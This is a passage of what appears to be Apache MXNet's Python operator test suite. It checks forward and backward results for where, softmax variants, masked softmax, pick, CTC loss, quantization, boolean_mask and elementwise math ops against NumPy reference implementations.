out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
        grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int64)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
        assert same(expect_out, out)
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
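        # Run the op in a low-precision dtype and in a higher-precision reference dtype;
        # with MXNET_SAFE_ACCUMULATION=1 the outputs and input gradients should closely agree.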
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
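        # Reference implementation: softmax along axis 1 restricted to the first length[i, j]
        # entries of each column; positions beyond the length remain zero.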
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def np_softmax(x, axis=-1, temperature=1.0, normalize=True):
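    # Reference softmax; subtracting the per-axis max keeps exp() numerically stable.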
if normalize:
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x / temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def np_masked_softmax(data, mask, axis=-1, temperature=1.0, normalize=True):
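    # Masked positions are replaced with a large negative value (smaller in magnitude for
    # float16 to avoid overflow) before the softmax, then zeroed out in the result.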
neg = -1e18
if data.dtype == np.float16:
neg = -1e4
temp = np.where(mask, data, neg)
result = np_softmax(temp, axis=axis,
temperature=temperature,
normalize=normalize) * mask
return result
def np_masked_softmax_grad(out, grad_out, axis=-1, temperature=1.0):
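    # Standard softmax backward: dL/dx = out * (grad_out - sum(out * grad_out, axis)) / temperature.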
temp = np.sum(out * grad_out, axis=axis, keepdims=True)
result = out * (grad_out - temp) / temperature
return result
def np_masked_log_softmax_grad(out, grad_out, mask, axis=-1, temperature=1.0):
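    # log-softmax backward with masked gradients zeroed: (g - exp(out) * sum(g, axis)) / temperature,
    # re-masked so that masked positions receive no gradient.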
grad_out = np.where(mask, grad_out, 0)
temp = np.sum(grad_out, axis=axis, keepdims=True)
result = (grad_out - np.exp(out) * temp) / temperature
result = np.where(mask, result, 0)
return result
@pytest.mark.parametrize('dtype', [np.float16, np.float32, np.float64])
@pytest.mark.parametrize('axis', [0, -1, -2, -3])
@pytest.mark.parametrize('ndims', [3, 4, 5])
@pytest.mark.parametrize('n_broadcast_axis', [0, 1, 2])
@pytest.mark.parametrize('temperature', [1, 5, 9, 11])
@pytest.mark.parametrize('normalize', [True])
@pytest.mark.flaky
def test_masked_softmax(dtype, axis, ndims, n_broadcast_axis, temperature, normalize):
n_broadcast_axis = min(n_broadcast_axis, ndims - 1)
shape = rand_shape_nd(ndims, dim=10)
mx_data = rand_ndarray(shape, dtype=dtype)
bcst_dims = []
while len(bcst_dims) < n_broadcast_axis:
ax = np.random.randint(0, ndims)
        if ax not in bcst_dims:
bcst_dims.append(ax)
shape_mask = list(shape)
for i in bcst_dims:
shape_mask[i] = 1
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape_mask)
    mx_mask = mx.nd.array(np_mask, dtype=np.bool_)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np_masked_softmax(np_data, np_mask, axis,
temperature, normalize)
np_grad_out = np_masked_softmax_grad(np_out, np_grad,
axis, temperature)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_softmax(data=data, mask=mask,
temperature=temperature, axis=axis,
normalize=normalize)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol,
dtype="asnumpy", equal_nan=True)
check_symbolic_backward(mx_sym, location, [mx_grad],
                                [np_grad_out, np.zeros(shape, dtype=np.bool_)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
@pytest.mark.parametrize('dtype', ['float32'])
@pytest.mark.parametrize('ndims', [1, 2, 3, 4, 5])
def test_masked_log_softmax(dtype, ndims):
shape = np.random.randint(1, 5, size=ndims)
axis = np.random.randint(0, ndims)
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape)
    mx_mask = mx.nd.array(np_mask, dtype=np.bool_)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np.log(np_masked_softmax(np_data, np_mask, axis)+1e-20) * np_mask
np_out_inf = np.where(np_mask, np_out, -np.inf)
np_grad_out = np_masked_log_softmax_grad(np_out, np_grad, np_mask, axis)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_log_softmax(data=data, mask=mask, axis=axis-ndims)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out_inf], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [mx_grad],
                            [np_grad_out, np.zeros(shape, dtype=np.bool_)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
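            # Build the advanced-indexing arrays that reproduce pick(): the (possibly wrapped)
            # index along axis, plus a broadcastable arange along every other axis.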
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
            expected = data[tuple(exp)]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc._bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
    for i in range(seq_len * batch_size):
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient tol test
# due to finite-difference method inaccuracies or function discontinuities at the origin
def bad_input_finder(f, f_grad, dtype):
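    # Flag inputs within eps/2 of the origin, or where the central finite-difference estimate
    # of the derivative deviates from the analytic gradient f_grad by more than the default rtol.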
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
